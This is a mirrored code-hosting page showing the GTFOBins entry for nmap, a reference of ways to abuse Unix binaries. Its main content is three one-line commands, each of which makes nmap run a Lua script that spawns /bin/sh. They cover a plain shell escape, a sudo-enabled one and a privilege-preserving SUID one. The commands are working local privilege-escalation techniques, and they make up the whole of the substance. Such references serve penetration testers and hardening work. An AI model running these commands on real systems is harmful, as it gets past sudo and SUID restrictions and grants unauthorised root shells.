This website requires JavaScript.
Explore
Help
Register
Sign In
mirror
/
GTFOBins.github.io
Watch
1
Star
0
Fork
0
You've already forked GTFOBins.github.io
mirror of
https://github.com/GTFOBins/GTFOBins.github.io.git
synced
2026-01-07 16:21:32 +01:00
Code
Issues
0ba5df0cb9
GTFOBins.github.io
/
_gtfobins
/
nmap.md
Emilio Pinna
14c8781f2d
Fix nmap description and temporary file
2018-08-19 11:20:37 +01:00
576 B
Raw
Blame
History
functions
execute-interactive
sudo-enabled
suid-enabled
description
code
Echoing of input characters is disabled.
TF=$(mktemp) echo 'os.execute("/bin/sh")' > $TF nmap --script=$TF
description
code
Echoing of input characters is disabled.
TF=$(mktemp) echo 'os.execute("/bin/sh")' > $TF sudo nmap --script=$TF
description
code
Echoing of input characters is disabled.
TF=$(mktemp) echo 'os.execute("/bin/sh -p")' > $TF ./nmap --script=$TF